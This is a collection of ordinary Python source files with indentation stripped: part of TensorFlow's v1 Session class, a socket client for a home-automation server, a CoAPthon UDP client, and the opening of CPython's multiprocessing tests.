# TODO(yuanbyu, keveman): Revisit whether we should just treat feeding
# of a handle from a different device as an error.
_ = self._update_with_movers(feed_dict_tensor, feed_map)
final_fetches = fetch_handler.fetches()
final_targets = fetch_handler.targets()
# We only want to really perform the run if fetches or targets are provided,
# or if the call is a partial run that specifies feeds.
if final_fetches or final_targets or (handle and feed_dict_tensor):
results = self._do_run(handle, final_targets, final_fetches,
feed_dict_tensor, options, run_metadata)
else:
results = []
return fetch_handler.build_results(self, results)
def make_callable(self, fetches, feed_list=None, accept_options=False):
"""Returns a Python callable that runs a particular step.
The returned callable will take `len(feed_list)` arguments whose types
must be compatible feed values for the respective elements of `feed_list`.
For example, if element `i` of `feed_list` is a `tf.Tensor`, the `i`th
argument to the returned callable must be a numpy ndarray (or something
convertible to an ndarray) with matching element type and shape. See
`tf.Session.run` for details of the allowable feed key and value types.
The returned callable will have the same return type as
`tf.Session.run(fetches, ...)`. For example, if `fetches` is a `tf.Tensor`,
the callable will return a numpy ndarray; if `fetches` is a `tf.Operation`,
it will return `None`.
Args:
fetches: A value or list of values to fetch. See `tf.Session.run` for
details of the allowable fetch types.
feed_list: (Optional.) A list of `feed_dict` keys. See `tf.Session.run`
for details of the allowable feed key types.
accept_options: (Optional.) If `True`, the returned `Callable` will be
able to accept `tf.compat.v1.RunOptions` and `tf.compat.v1.RunMetadata`
as optional keyword arguments `options` and `run_metadata`,
respectively, with the same syntax and semantics as `tf.Session.run`,
which is useful for certain use cases (profiling and debugging) but will
result in measurable slowdown of the `Callable`'s
performance. Default: `False`.
Returns:
A function that when called will execute the step defined by
`feed_list` and `fetches` in this session.
Raises:
TypeError: If `fetches` or `feed_list` cannot be interpreted
as arguments to `tf.Session.run`.
"""
if feed_list is not None:
if not isinstance(feed_list, (list, tuple)):
raise TypeError('`feed_list` must be a list or tuple.')
# Delegate any non-empty feed lists to the existing `run()` logic.
# TODO(mrry): Refactor the feed handling logic from
# `Session._run()` so that we can convert the feeds to a list of
# strings here.
def _generic_run(*feed_args, **kwargs):
feed_dict = {
feed: feed_val for feed, feed_val in zip(feed_list, feed_args)
}
return self.run(fetches, feed_dict=feed_dict, **kwargs)
return _generic_run
# Ensure any changes to the graph are reflected in the runtime.
# Note that we don't need to do this on subsequent calls to the
# returned object, because the arguments to `fetches` must already be
# in the graph.
self._extend_graph()
# Create a fetch handler to take care of the structure of fetches.
fetch_handler = _FetchHandler(self._graph, fetches, {})
# pylint: disable=protected-access
fetch_list = [t._as_tf_output() for t in fetch_handler.fetches()]
target_list = [op._c_op for op in fetch_handler.targets()]
# pylint: enable=protected-access
def _callable_template_with_options_and_metadata(fetch_list,
target_list,
fetch_handler,
options=None,
run_metadata=None):
"""Template callable that accepts RunOptions and RunMetadata."""
options_ptr = tf_session.TF_NewBufferFromString(
compat.as_bytes(options.SerializeToString())) if options else None
run_metadata_ptr = tf_session.TF_NewBuffer() if run_metadata else None
try:
results = self._call_tf_sessionrun(options_ptr, {}, fetch_list,
target_list, run_metadata_ptr)
if fetch_handler:
results = fetch_handler.build_results(self, results)
else:
results = results[0] if results else None
if run_metadata:
proto_data = tf_session.TF_GetBuffer(run_metadata_ptr)
run_metadata.ParseFromString(compat.as_bytes(proto_data))
finally:
if run_metadata_ptr:
tf_session.TF_DeleteBuffer(run_metadata_ptr)
if options:
tf_session.TF_DeleteBuffer(options_ptr)
return results
if accept_options:
return functools.partial(_callable_template_with_options_and_metadata,
fetch_list, target_list, fetch_handler)
elif isinstance(fetches, ops.Operation):
# Special case for fetching a single operation, because the
# function will have no return value.
assert not fetch_list
assert len(target_list) == 1
def _single_operation_run():
self._call_tf_sessionrun(None, {}, [], target_list, None)
return _single_operation_run
elif isinstance(fetches, ops.Tensor):
# Special case for fetching a single tensor, because the
# function can return the result of `TF_Run()` directly.
assert len(fetch_list) == 1
assert not target_list
def _single_tensor_run():
results = self._call_tf_sessionrun(None, {}, fetch_list, [], None)
return results[0]
return _single_tensor_run
else:
# In all other cases, we must use `fetch_handler` to build the
# results for us.
def _fetch_handler_run():
results = self._call_tf_sessionrun(None, {}, fetch_list, target_list,
None)
return fetch_handler.build_results(self, results)
return _fetch_handler_run
# Captures the name of a node in an error status. The regex below matches
# both the old and the new formats:
# Old format: [[Node: <node_name> = ...]]
# New format: [[{{node <node_name>}} = ...]]
_NODEDEF_NAME_RE = re.compile(
r'\[\[(Node: )?(\{\{node )?([^\} ]*)(\}\})?\s*=*')
def _do_run(self, handle, target_list, fetch_list, feed_dict, options,
run_metadata):
"""Runs a step based on the given fetches and feeds.
Args:
handle: a handle for partial_run. None if this is just a call to run().
target_list: A list of operations to be run, but not fetched.
fetch_list: A list of tensors to be fetched.
feed_dict: A dictionary that maps tensors to numpy ndarrays.
options: A (pointer to a) [`RunOptions`] protocol buffer, or None
run_metadata: A (pointer to a) [`RunMetadata`] protocol buffer, or None
Returns:
A list of numpy ndarrays, corresponding to the elements of
`fetch_list`. If the ith element of `fetch_list` contains the
name of an operation, the first Tensor output of that operation
will be returned for that element.
Raises:
tf.errors.OpError: Or one of its subclasses on error.
"""
# pylint: disable=protected-access
feeds = dict((t.deref()._as_tf_output(), v) for t, v in feed_dict.items())
fetches = [t._as_tf_output() for t in fetch_list]
targets = [op._c_op for op in target_list]
# pylint: enable=protected-access
def _run_fn(feed_dict, fetch_list, target_list, options, run_metadata):
# Ensure any changes to the graph are reflected in the runtime.
self._extend_graph()
return self._call_tf_sessionrun(options, feed_dict, fetch_list,
target_list, run_metadata)
def _prun_fn(handle, feed_dict, fetch_list):
if target_list:
raise RuntimeError('partial_run() requires empty target_list.')
return self._call_tf_sessionprun(handle, feed_dict, fetch_list)
if handle is None:
return self._do_call(_run_fn, feeds, fetches, targets, options,
run_metadata)
else:
return self._do_call(_prun_fn, handle, feeds, fetches)
def _do_call(self, fn, *args):
try:
return fn(*args)
except errors.OpError as e:
message = compat.as_text(e.message)
m = BaseSession._NODEDEF_NAME_RE.search(message)
node_def = None
op = None
if m is not None:
node_name = m.group(3)
try:
op = self._graph.get_operation_by_name(node_name)
node_def = op.node_def
except KeyError:
pass
message = error_interpolation.interpolate(message, self._graph)
if 'only supports NHWC tensor format' in message:
message += ('\nA possible workaround: Try disabling Grappler optimizer'
'\nby modifying the config for creating the session eg.'
'\nsession_config.graph_options.rewrite_options.'
'disable_meta_optimizer = True')
raise type(e)(node_def, op, message)
def _extend_graph(self):
with self._graph._session_run_lock(): # pylint: disable=protected-access
tf_session.ExtendSession(self._session)
# The threshold to run garbage collection to delete dead tensors.
_DEAD_HANDLES_THRESHOLD = 10
def _register_dead_handle(self, handle):
# Register a dead handle in the session. Delete the dead tensors when
# the number of dead tensors exceeds certain threshold.
tensors_to_delete = None
with self._delete_lock:
self._dead_handles.append(handle)
if len(self._dead_handles) == BaseSession._DEAD_HANDLES_THRESHOLD:
tensors_to_delete = self._dead_handles
self._dead_handles = []
# Delete the dead tensors.
if tensors_to_delete:
feeds = {}
fetches = []
for deleter_key, tensor_handle in enumerate(tensors_to_delete):
holder, deleter = session_ops._get_handle_deleter(
self.graph, deleter_key, tensor_handle)
feeds[holder] = tensor_handle
fetches.append(deleter)
self.run(fetches, feed_dict=feeds)
def _update_with_movers(self, feed_dict, feed_map):
# If a tensor handle that is fed to a device incompatible placeholder,
# we move the tensor to the right device, generate a new tensor handle,
# and update `feed_dict` to use the new handle.
handle_movers = []
for feed_name, val in feed_map.items():
mover = session_ops._get_handle_mover(self.graph, *val)
if mover:
handle_movers.append((feed_name, val[1], mover))
# Transfer a tensor to the right device if needed.
if not handle_movers:
return []
else:
feeds = {}
fetches = []
for _, handle, mover in handle_movers:
feeds[mover[0]] = handle
fetches.append(mover[1])
handles = self.run(fetches, feed_dict=feeds)
for handle_mover, handle in zip(handle_movers, handles):
np_val = np.array(handle.handle, dtype=np.object)
feed_name = handle_mover[0]
feed_tensor = feed_map[feed_name][0]
feed_dict[feed_tensor.experimental_ref()] = np_val
return handles
def _call_tf_sessionrun(self, options, feed_dict, fetch_list, target_list,
run_metadata):
return tf_session.TF_SessionRun_wrapper(self._session, options, feed_dict,
fetch_list, target_list,
run_metadata)
def _call_tf_sessionprun(self, handle, feed_dict, fetch_list):
return tf_session.TF_SessionPRun_wrapper(self._session, handle, feed_dict,
fetch_list)
# pylint: disable=protected-access
class _Callable(object):
"""Experimental wrapper for the C++ `Session::MakeCallable()` API."""
def __init__(self, session, callable_options):
self._session = session
self._handle = None
options_ptr = tf_session.TF_NewBufferFromString(
compat.as_bytes(callable_options.SerializeToString()))
try:
self._handle = tf_session.TF_SessionMakeCallable(
session._session, options_ptr)
finally:
tf_session.TF_DeleteBuffer(options_ptr)
def __call__(self, *args, **kwargs):
# TODO(b/74355905): Support argument and return value nested structures,
# and tensor-like objects such as SparseTensors.
run_metadata = kwargs.get('run_metadata', None)
try:
run_metadata_ptr = tf_session.TF_NewBuffer() if run_metadata else None
ret = tf_session.TF_SessionRunCallable(self._session._session,
self._handle, args,
run_metadata_ptr)
if run_metadata:
proto_data = tf_session.TF_GetBuffer(run_metadata_ptr)
run_metadata.ParseFromString(compat.as_bytes(proto_data))
finally:
if run_metadata_ptr:
tf_session.TF_DeleteBuffer(run_metadata_ptr)
return ret
def __del__(self):
# NOTE(mrry): It is possible that `self._session.__del__()` could be
# called before this destructor, in which case `self._session._session`
# will be `None`.
if (self._handle is not None and self._session._session is not None and
not self._session._closed):
tf_session.TF_SessionReleaseCallable(self._session._session,
self._handle)
# pylint: enable=protected-access
# TODO(b/74355905): Reimplement `Session.make_callable()` using this method
# where possible.
def _make_callable_from_options(self, callable_options):
"""Returns a handle to a "callable" with the given options.
Args:
callable_options: A `CallableOptions` protocol buffer message describing
the computation that will be performed by the callable.
Returns:
A handle to the new callable.
"""
self._extend_graph()
return BaseSession._Callable(self, callable_options)
@tf_export(v1=['Session'])
class Session(BaseSession):
"""A class for running TensorFlow operations.
A `Session` object encapsulates the environment in which `Operation`
objects are executed, and `Tensor` objects are evaluated. For
example:
```python
# Build a graph.
a = tf.constant(5.0)
b = tf.constant(6.0)
c = a * b
# Launch the graph in a session.
sess = tf.compat.v1.Session()
# Evaluate the tensor `c`.
print(sess.run(c))
```
A session may own resources, such as
`tf.Variable`, `tf.queue.QueueBase`,
and `tf.compat.v1.ReaderBase`. It is important to release
these resources when they are no longer required. To do this, either
invoke the `tf.Session.close` method on the session, or use
the session as a context manager. The following two examples are
equivalent:
```python
# Using the `close()` method.
sess = tf.compat.v1.Session()
sess.run(...)
sess.close()
# Using the context manager.
with tf.compat.v1.Session() as sess:
sess.run(...)
```
The
[`ConfigProto`](https://www.tensorflow.org/code/tensorflow/core/protobuf/config.proto)
protocol buffer exposes various configuration options for a
session. For example, to create a session that uses soft constraints
for device placement, and log the resulting placement decisions,
create a session as follows:
```python
# Launch the graph in a session that allows soft device placement and
# logs the placement decisions.
sess = tf.compat.v1.Session(config=tf.compat.v1.ConfigProto(
allow_soft_placement=True,
log_device_placement=True))
```
"""
def __init__(self, target='', graph=None, config=None):
"""Creates a new TensorFlow session.
If no `graph` argument is specified when constructing the session,
the default graph will be launched in the session. If you are
using more than one graph (created with `tf.Graph()`) in the same
process, you will have to use different sessions for each graph,
but each graph can be used in multiple sessions. In this case, it
is often clearer to pass the graph to be launched explicitly to
the session constructor.
Args:
target: (Optional.) The execution engine to connect to. Defaults to using
an in-process engine. See
[Distributed TensorFlow](https://tensorflow.org/deploy/distributed) for
more examples.
graph: (Optional.) The `Graph` to be launched (described above).
config: (Optional.) A
[`ConfigProto`](https://www.tensorflow.org/code/tensorflow/core/protobuf/config.proto)
protocol buffer with configuration options for the session.
"""
super(Session, self).__init__(target, graph, config=config)
# NOTE(mrry): Create these on first `__enter__` to avoid a reference cycle.
self._default_graph_context_manager = None
self._default_session_context_manager = None
def __enter__(self):
if self._default_graph_context_manager is None:
self._default_graph_context_manager = self.graph.as_default()
else:
raise RuntimeError('Session context managers are not re-entrant. '
'Use `Session.as_default()` if you want to enter '
'a session multiple times.')
if self._default_session_context_manager is None:
self._default_session_context_manager = self.as_default()
self._default_graph_context_manager.__enter__()
return self._default_session_context_manager.__enter__()
def __exit__(self, exec_type, exec_value, exec_tb):
if exec_type is errors.OpError:
logging.error('Session closing due to OpError: %s', (exec_value,))
try:
self._default_session_context_manager.__exit__(exec_type, exec_value,
exec_tb)
except RuntimeError as error:
if error == exec_value:
# NOTE(skyewm): for some reason, in Python3,
# _default_session_context_manager.__exit__ will re-raise the "not
# re-entrant" exception raised in __enter__ above (note that if we're
# here, we're in the outer session context manager, since __exit__ is
# not called when __enter__ raises an exception). We still want to
# continue cleaning up this context manager before the exception is
# further propagated, so we ignore it here (note that it'll continue
# being propagated after this method completes).
pass
else:
raise
self._default_graph_context_manager.__exit__(exec_type, exec_value, exec_tb)
self._default_session_context_manager = None
self._default_graph_context_manager = None
# If we are closing due to an exception, set a time limit on our Close() to
# avoid blocking forever.
# TODO(b/120204635) remove this when deadlock is fixed.
if exec_type:
close_thread = threading.Thread(
name='SessionCloseThread', target=self.close)
close_thread.daemon = True
close_thread.start()
close_thread.join(30.0)
if close_thread.is_alive():
logging.error(
'Session failed to close after 30 seconds. Continuing after this '
'point may leave your program in an undefined state.')
else:
self.close()
@staticmethod
def reset(target, containers=None, config=None):
"""Resets resource containers on `target`, and close all connected sessions.
A resource container is distributed across all workers in the
same cluster as `target`. When a resource container on `target`
is reset, resources associated with that container will be cleared.
In particular, all Variables in the container will become undefined:
they lose their values and shapes.
NOTE:
(i) reset() is currently only implemented for distributed sessions.
(ii) Any sessions on the master named by `target` will be closed.
If no resource containers are provided, all containers are reset.
Args:
target: The execution engine to connect to.
containers: A list of resource container name strings, or `None` if all of
all the containers are to be reset.
config: (Optional.) Protocol buffer with configuration options.
Raises:
tf.errors.OpError: Or one of its subclasses if an error occurs while
resetting containers.
"""
if target is not None:
target = compat.as_bytes(target)
if containers is not None:
containers = [compat.as_bytes(c) for c in containers]
else:
containers = []
tf_session.TF_Reset(target, containers, config)
@tf_export(v1=['InteractiveSession'])
class InteractiveSession(BaseSession):
"""A TensorFlow `Session` for use in interactive contexts, such as a shell.
The only difference with a regular `Session` is that an `InteractiveSession`
installs itself as the default session on construction.
The methods `tf.Tensor.eval`
and `tf.Operation.run`
will use that session to run ops.
This is convenient in interactive shells and [IPython
notebooks](http://ipython.org), as it avoids having to pass an explicit
`Session` object to run ops.
For example:
```python
sess = tf.compat.v1.InteractiveSession()
a = tf.constant(5.0)
b = tf.constant(6.0)
c = a * b
# We can just use 'c.eval()' without passing 'sess'
print(c.eval())
sess.close()
```
Note that a regular session installs itself as the default session when it
is created in a `with` statement. The common usage in non-interactive
programs is to follow that pattern:
```python
a = tf.constant(5.0)
b = tf.constant(6.0)
c = a * b
with tf.compat.v1.Session():
# We can also use 'c.eval()' here.
print(c.eval())
```
"""
_count_lock = threading.Lock()
_active_session_count = 0 # GUARDED_BY(_count_lock)
def __init__(self, target='', graph=None, config=None):
"""Creates a new interactive TensorFlow session.
If no `graph` argument is specified when constructing the session,
the default graph will be launched in the session. If you are
using more than one graph (created with `tf.Graph()`) in the same
process, you will have to use different sessions for each graph,
but each graph can be used in multiple sessions. In this case, it
is often clearer to pass the graph to be launched explicitly to
the session constructor.
Args:
target: (Optional.) The execution engine to connect to. Defaults to using
an in-process engine.
graph: (Optional.) The `Graph` to be launched (described above).
config: (Optional) `ConfigProto` proto used to configure the session.
"""
if not config:
# If config is not provided, choose some reasonable defaults for
# interactive use:
#
# - Grow GPU memory as needed at the cost of fragmentation.
gpu_options = config_pb2.GPUOptions(allow_growth=True)
config = config_pb2.ConfigProto(gpu_options=gpu_options)
# Interactive sessions always place pruned graphs.
config.graph_options.place_pruned_graph = True
super(InteractiveSession, self).__init__(target, graph, config)
with InteractiveSession._count_lock:
if InteractiveSession._active_session_count > 0:
warnings.warn('An interactive session is already active. This can '
'cause out-of-memory errors in some cases. You must '
'explicitly call `InteractiveSession.close()` to release '
'resources held by the other session(s).')
InteractiveSession._active_session_count += 1
# NOTE(mrry): We do not use `Session._closed` here because it has unhelpful
# semantics (in particular, it is not set to true if `Session.close()` is
# called on a session that has not been "opened" by running a step) and we
# cannot change those semantics without breaking existing code.
self._explicitly_closed = False
self._default_session = self.as_default()
self._default_session.enforce_nesting = False
self._default_session.__enter__()
self._explicit_graph = graph
if self._explicit_graph is not None:
self._default_graph = graph.as_default()
self._default_graph.enforce_nesting = False
self._default_graph.__enter__()
def close(self):
"""Closes an `InteractiveSession`."""
super(InteractiveSession, self).close()
with InteractiveSession._count_lock:
if not self._explicitly_closed:
InteractiveSession._active_session_count -= 1
self._explicitly_closed = True
else:
return
if self._explicit_graph is not None:
self._default_graph.__exit__(None, None, None)
self._default_graph = None
self._default_session.__exit__(None, None, None)
self._default_session = None
|
socket_client.py
|
import selectors
import socket
import pkgutil
import inspect
import threading
from chaslib.socket_lib import CHASocket
class SocketClient:
def __init__(self, chas, host, port):
self.chas = chas # CHAS Instance
self.running = False # Value determining if the Socket Client is running
self.host = host # Hostanme of the CHAS server
self.port = port # Port num of the CHAS server
self.sel = selectors.DefaultSelector()
self.sock = None # CHAS socket connected to the CHAS server
self.handlers = [] # List of ID handlers
self.thread = None # Threading object
def start(self):
# Function for starting the Socket Client
self.running = True
self.parse_handlers()
self.thread = threading.Thread(target=self._sc_event_loop)
self.thread.daemon = True
self.thread.start()
return
def stop(self):
self.running = False
self.thread.join()
def _start_connection(self):
addr = (self.host, self.port)
# print(f"Starting connection to {addr}")
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 10000)
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 10000)
self.sock.connect_ex(addr)
self.sock.setblocking(False)
events = selectors.EVENT_READ
message = CHASocket(self.sel, self.sock, addr)
self.sel.register(self.sock, events, data=message)
message.write({'id': 1, 'uuid': None, 'content': None})
def _get_id(self, hand):
return hand.id_num
def parse_handlers(self):
# Function for parsing and loading ID Handlers
direct = [self.chas.settings.id_dir]
try:
for finder, name, _ in pkgutil.iter_modules(direct):
mod = finder.find_module(name).load_module(name)
for member in dir(mod):
obj = getattr(mod, member)
if inspect.isclass(obj):
for parent in obj.__bases__:
if 'IDHandle' is parent.__name__:
# Appending CHAS to handler
obj.chas = self.chas
self.handlers.append(obj())
except:
# An error has occurred
return
self.handlers.sort(key=self._get_id)
print(self.handlers)
return
def _sc_event_loop(self):
self._start_connection()
print("In socket server event loop...")
while self.running:
events = self.sel.select(timeout=1)
for key, mask in events:
message = key.data
try:
if mask & selectors.EVENT_READ:
data = message.read()
#print(message)
self.handler(data, message)
except Exception as e:
print(f"An error occurred: {e}")
message.close()
if not self.sel.get_map():
pass
def handler(self, data, sock):
uuid = data['uuid']
req_id = data['id']
content = data['content']
hand = self.handlers[req_id]
server = self.chas.server
if req_id == 1:
# Authenticating...
print("Sending to auth handler:")
hand.handel(sock, content)
return
hand.handel(server, content)
|
coap.py
|
import logging.config
import random
import socket
import threading
import time
from coapthon import defines
from coapthon.layers.blocklayer import BlockLayer
from coapthon.layers.messagelayer import MessageLayer
from coapthon.layers.observelayer import ObserveLayer
from coapthon.layers.requestlayer import RequestLayer
from coapthon.messages.message import Message
from coapthon.messages.request import Request
from coapthon.messages.response import Response
from coapthon.serializer import Serializer
__author__ = 'Giacomo Tanganelli'
logger = logging.getLogger(__name__)
class CoAP(object):
"""
Client class to perform requests to remote servers.
"""
def __init__(self, server, starting_mid, callback, sock=None, cb_ignore_read_exception=None, cb_ignore_write_exception=None):
"""
Initialize the client.
:param server: Server address for incoming connections
:param callback:the callback function to be invoked when a response is received
:param starting_mid: used for testing purposes
:param sock: if a socket has been created externally, it can be used directly
:param cb_ignore_read_exception: Callback function to handle exception raised during the socket read operation
:param cb_ignore_write_exception: Callback function to handle exception raised during the socket write operation
"""
self._currentMID = starting_mid
self._server = server
self._callback = callback
self._cb_ignore_read_exception = cb_ignore_read_exception
self._cb_ignore_write_exception = cb_ignore_write_exception
self.stopped = threading.Event()
self.to_be_stopped = []
self._messageLayer = MessageLayer(self._currentMID)
self._blockLayer = BlockLayer()
self._observeLayer = ObserveLayer()
self._requestLayer = RequestLayer(self)
addrinfo = socket.getaddrinfo(self._server[0], None)[0]
if sock is not None:
self._socket = sock
elif addrinfo[0] == socket.AF_INET:
self._socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
else:
self._socket = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self._receiver_thread = None
def close(self):
"""
Stop the client.
"""
self.stopped.set()
for event in self.to_be_stopped:
event.set()
if self._receiver_thread is not None and self._receiver_thread.isAlive():
self._receiver_thread.join()
try:
# Python does not close the OS FD on socket.close()
# Ensure OS socket is closed with shutdown to prevent FD leak
self._socket.shutdown(socket.SHUT_RDWR)
except socket.error:
pass
self._socket.close()
@property
def current_mid(self):
"""
Return the current MID.
:return: the current mid
"""
return self._currentMID
@current_mid.setter
def current_mid(self, c):
"""
Set the current MID.
:param c: the mid to set
"""
assert isinstance(c, int)
self._currentMID = c
def send_message(self, message):
"""
Prepare a message to send on the UDP socket. Eventually set retransmissions.
:param message: the message to send
"""
if isinstance(message, Request):
request = self._requestLayer.send_request(message)
request = self._observeLayer.send_request(request)
request = self._blockLayer.send_request(request)
transaction = self._messageLayer.send_request(request)
self.send_datagram(transaction.request)
if transaction.request.type == defines.Types["CON"]:
self._start_retransmission(transaction, transaction.request)
elif isinstance(message, Message):
message = self._observeLayer.send_empty(message)
message = self._messageLayer.send_empty(None, None, message)
self.send_datagram(message)
def end_observation(self, token):
"""
Remove an observation token from our records.
:param token: the token for the observation
"""
dummy = Message()
dummy.token = token
dummy.destination = self._server
self._observeLayer.remove_subscriber(dummy)
@staticmethod
def _wait_for_retransmit_thread(transaction):
"""
Only one retransmit thread at a time, wait for other to finish
"""
if hasattr(transaction, 'retransmit_thread'):
while transaction.retransmit_thread is not None:
logger.debug("Waiting for retransmit thread to finish ...")
time.sleep(0.01)
continue
def _send_block_request(self, transaction):
"""
A former request resulted in a block wise transfer. With this method, the block wise transfer
will be continued, including triggering of the retry mechanism.
:param transaction: The former transaction including the request which should be continued.
"""
transaction = self._messageLayer.send_request(transaction.request)
# ... but don't forget to reset the acknowledge flag
transaction.request.acknowledged = False
self.send_datagram(transaction.request)
if transaction.request.type == defines.Types["CON"]:
self._start_retransmission(transaction, transaction.request)
def send_datagram(self, message):
"""
Send a message over the UDP socket.
:param message: the message to send
"""
host, port = message.destination
logger.debug("send_datagram - " + str(message))
serializer = Serializer()
raw_message = serializer.serialize(message)
try:
self._socket.sendto(raw_message, (host, port))
except Exception as e:
if self._cb_ignore_write_exception is not None and callable(self._cb_ignore_write_exception):
if not self._cb_ignore_write_exception(e, self):
raise
if self._receiver_thread is None or not self._receiver_thread.isAlive():
self._receiver_thread = threading.Thread(target=self.receive_datagram)
self._receiver_thread.start()
def _start_retransmission(self, transaction, message):
"""
Start the retransmission task.
:type transaction: Transaction
:param transaction: the transaction that owns the message that needs retransmission
:type message: Message
:param message: the message that needs the retransmission task
"""
with transaction:
if message.type == defines.Types['CON']:
future_time = random.uniform(defines.ACK_TIMEOUT, (defines.ACK_TIMEOUT * defines.ACK_RANDOM_FACTOR))
transaction.retransmit_stop = threading.Event()
self.to_be_stopped.append(transaction.retransmit_stop)
transaction.retransmit_thread = threading.Thread(target=self._retransmit,
name=str('%s-Retry-%d' % (threading.current_thread().name, message.mid)),
args=(transaction, message, future_time, 0))
transaction.retransmit_thread.start()
def _retransmit(self, transaction, message, future_time, retransmit_count):
"""
Thread function to retransmit the message in the future
:param transaction: the transaction that owns the message that needs retransmission
:param message: the message that needs the retransmission task
:param future_time: the amount of time to wait before a new attempt
:param retransmit_count: the number of retransmissions
"""
with transaction:
logger.debug("retransmit loop ... enter")
while retransmit_count <= defines.MAX_RETRANSMIT \
and (not message.acknowledged and not message.rejected) \
and not transaction.retransmit_stop.isSet():
transaction.retransmit_stop.wait(timeout=future_time)
if not message.acknowledged and not message.rejected and not transaction.retransmit_stop.isSet():
retransmit_count += 1
future_time *= 2
if retransmit_count < defines.MAX_RETRANSMIT:
logger.debug("retransmit loop ... retransmit Request")
self.send_datagram(message)
if message.acknowledged or message.rejected:
message.timeouted = False
else:
logger.warning("Give up on message {message}".format(message=message.line_print))
message.timeouted = True
# Inform the user, that nothing was received
self._callback(None)
try:
self.to_be_stopped.remove(transaction.retransmit_stop)
except ValueError:
pass
transaction.retransmit_stop = None
transaction.retransmit_thread = None
logger.debug("retransmit loop ... exit")
def receive_datagram(self):
"""
Receive datagram from the UDP socket and invoke the callback function.
"""
logger.debug("Start receiver Thread")
while not self.stopped.isSet():
self._socket.settimeout(0.1)
try:
datagram, addr = self._socket.recvfrom(1152)
except socket.timeout: # pragma: no cover
continue
except Exception as e: # pragma: no cover
if self._cb_ignore_read_exception is not None and callable(self._cb_ignore_read_exception):
if self._cb_ignore_read_exception(e, self):
continue
return
else: # pragma: no cover
if len(datagram) == 0:
logger.debug("Exiting receiver Thread due to orderly shutdown on server end")
return
serializer = Serializer()
try:
host, port = addr
except ValueError:
host, port, tmp1, tmp2 = addr
source = (host, port)
message = serializer.deserialize(datagram, source)
if isinstance(message, Response):
logger.debug("receive_datagram - " + str(message))
transaction, send_ack = self._messageLayer.receive_response(message)
if transaction is None: # pragma: no cover
continue
self._wait_for_retransmit_thread(transaction)
if send_ack:
self._send_ack(transaction)
self._blockLayer.receive_response(transaction)
if transaction.block_transfer:
self._send_block_request(transaction)
continue
elif transaction is None: # pragma: no cover
self._send_rst(transaction)
return
self._observeLayer.receive_response(transaction)
if transaction.notification: # pragma: no cover
ack = Message()
ack.type = defines.Types['ACK']
ack = self._messageLayer.send_empty(transaction, transaction.response, ack)
self.send_datagram(ack)
self._callback(transaction.response)
else:
self._callback(transaction.response)
elif isinstance(message, Message):
self._messageLayer.receive_empty(message)
logger.debug("Exiting receiver Thread due to request")
def _send_ack(self, transaction):
"""
Sends an ACK message for the response.
:param transaction: transaction that holds the response
"""
ack = Message()
ack.type = defines.Types['ACK']
if not transaction.response.acknowledged:
ack = self._messageLayer.send_empty(transaction, transaction.response, ack)
self.send_datagram(ack)
def _send_rst(self, transaction): # pragma: no cover
"""
Sends an RST message for the response.
:param transaction: transaction that holds the response
"""
rst = Message()
rst.type = defines.Types['RST']
if not transaction.response.acknowledged:
rst = self._messageLayer.send_empty(transaction, transaction.response, rst)
self.send_datagram(rst)
|
_test_multiprocessing.py
|
#
# Unit tests for the multiprocessing package
#
import unittest
import queue as pyqueue
import contextlib
import time
import io
import itertools
import sys
import os
import gc
import errno
import signal
import array
import socket
import random
import logging
import struct
import operator
import weakref
import test.support
import test.support.script_helper
from test import support
# Skip tests if _multiprocessing wasn't built.
_multiprocessing = test.support.import_module('_multiprocessing')
# Skip tests if sem_open implementation is broken.
test.support.import_module('multiprocessing.synchronize')
# import threading after _multiprocessing to raise a more relevant error
# message: "No module named _multiprocessing". _multiprocessing is not compiled
# without thread support.
import threading
import multiprocessing.connection
import multiprocessing.dummy
import multiprocessing.heap
import multiprocessing.managers
import multiprocessing.pool
import multiprocessing.queues
from multiprocessing import util
try:
from multiprocessing import reduction
HAS_REDUCTION = reduction.HAVE_SEND_HANDLE
except ImportError:
HAS_REDUCTION = False
try:
from multiprocessing.sharedctypes import Value, copy
HAS_SHAREDCTYPES = True
except ImportError:
HAS_SHAREDCTYPES = False
try:
import msvcrt
except ImportError:
msvcrt = None
#
#
#
# Timeout to wait until a process completes
TIMEOUT = 30.0 # seconds
def latin(s):
return s.encode('latin')
def close_queue(queue):
if isinstance(queue, multiprocessing.queues.Queue):
queue.close()
queue.join_thread()
def join_process(process):
# Since multiprocessing.Process has the same API than threading.Thread
# (join() and is_alive(), the support function can be reused
support.join_thread(process, timeout=TIMEOUT)
#
# Constants
#
LOG_LEVEL = util.SUBWARNING
#LOG_LEVEL = logging.DEBUG
DELTA = 0.1
CHECK_TIMINGS = False # making true makes tests take a lot longer
# and can sometimes cause some non-serious
# failures because some calls block a bit
# longer than expected
if CHECK_TIMINGS:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.82, 0.35, 1.4
else:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.1, 0.1, 0.1
HAVE_GETVALUE = not getattr(_multiprocessing,
'HAVE_BROKEN_SEM_GETVALUE', False)
WIN32 = (sys.platform == "win32")
from multiprocessing.connection import wait
def wait_for_handle(handle, timeout):
if timeout is not None and timeout < 0.0:
timeout = None
return wait([handle], timeout)
try:
MAXFD = os.sysconf("SC_OPEN_MAX")
except:
MAXFD = 256
# To speed up tests when using the forkserver, we can preload these:
PRELOAD = ['__main__', 'test.test_multiprocessing_forkserver']
#
# Some tests require ctypes
#
try:
from ctypes import Structure, c_int, c_double, c_longlong
except ImportError:
Structure = object
c_int = c_double = c_longlong = None
def check_enough_semaphores():
"""Check that the system supports enough semaphores to run the test."""
# minimum number of semaphores available according to POSIX
nsems_min = 256
try:
nsems = os.sysconf("SC_SEM_NSEMS_MAX")
except (AttributeError, ValueError):
# sysconf not available or setting not available
return
if nsems == -1 or nsems >= nsems_min:
return
raise unittest.SkipTest("The OS doesn't support enough semaphores "
"to run the test (required: %d)." % nsems_min)
#
# Creates a wrapper for a function which records the time it takes to finish
#
class TimingWrapper(object):
def __init__(self, func):
self.func = func
self.elapsed = None
def __call__(self, *args, **kwds):
t = time.time()
try:
return self.func(*args, **kwds)
finally:
self.elapsed = time.time() - t
#
# Base class for test cases
